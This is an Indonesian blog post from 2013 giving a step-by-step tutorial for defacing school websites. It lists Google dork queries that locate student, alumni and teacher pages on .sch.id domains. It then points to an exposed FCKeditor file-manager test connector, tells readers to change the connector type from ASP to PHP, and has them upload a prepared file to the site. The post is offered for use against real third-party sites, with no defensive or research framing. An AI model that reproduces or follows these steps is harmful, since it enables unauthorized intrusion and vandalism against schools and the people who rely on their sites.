Saturday, May 25, 2013

Deface Web Sekolah

Di sini kita akan menyelipkan file txt di situs sekolah, ingat ya.. gk file index.php..

soalnya kalo index ane gk bisa =) 

bahan yang di perlukan : 



1. Siapkan file txt.



2. Dork: 
  • inurl:/html/siswa.php? 
  • inurl:/html/alumni.php?
  • inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html (lalu, copas ini)
EX:
  • http://xxx.sch.id/html/siswa.php
  • http://xxx.sch.id/html/almni.php
  • http://xxx.sch.id/html/guru.php
*Sesuai Dork.

Ganti jadi: http://xxxx.sch.id/editor/filemanager/connectors/test.html 

4. Ganti ASP jadi PHP.

5. Browse file txt yang sudah disiapkan -> open -> upload.

0 comments:

Post a Comment

1. Harap comment dengan baik
2. No Spam
3. No Flood
4. No Junk
5. Silahkan di Follow, nanti saya Follback :D

Thanks

Twitter Delicious Facebook Digg Stumbleupon Favorites More